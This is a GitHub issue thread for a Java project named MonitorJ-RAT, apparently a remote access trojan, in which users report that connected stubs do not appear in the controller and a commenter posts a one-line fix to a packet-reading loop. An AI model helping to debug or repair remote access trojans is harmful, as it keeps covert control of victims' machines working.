### ISSUE TITLE
Client doesn't list

### ISSUE THREAD

**Issue by owendoeswork** [JershDervis/MonitorJ-RAT#4]
Whenever I run the client, it says it connects, on both sides, but it doesn't show up on the client page

**Comment by tamer-dahdul** [comment]
Whenever I run the client, it says it connects, on both sides, but it doesn't show up on the client page

same here ...

**Comment by pikachu6000** [comment]
Same here...

**Comment by w4z3d** [comment]
I have found the Issue. It is in the BaseClient class in both modules(MonitorJ, MonitorJStub. there is a less than character in line 59 thath should be a greater than

```java
try {
  -- while((packet = this.dataInputStream.readByte()) < 0)
  ++while((packet = this.dataInputStream.readByte()) > 0)  
        MonitorJStub.getInstance().EVENT_RECEIVE_PACKET.call(packet, this);
} catch (IOException e)
  e.printStackTrace();
}
```

issue #2 also solved with that

**Comment by pikachu6000** [comment]
Thanks @Wazed-Matthis
